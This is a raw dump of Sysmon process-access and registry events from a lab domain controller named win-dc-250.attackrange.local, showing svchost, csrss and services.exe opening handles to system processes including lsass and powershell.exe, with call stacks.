13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.057{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000590) 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4289-6000-1900-000000009A01}2204C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4286-6000-0A00-000000009A01}8441184C:\Windows\system32\services.exe{08A6967A-4289-6000-1900-000000009A01}2204C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.010{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.010{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000058f) 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 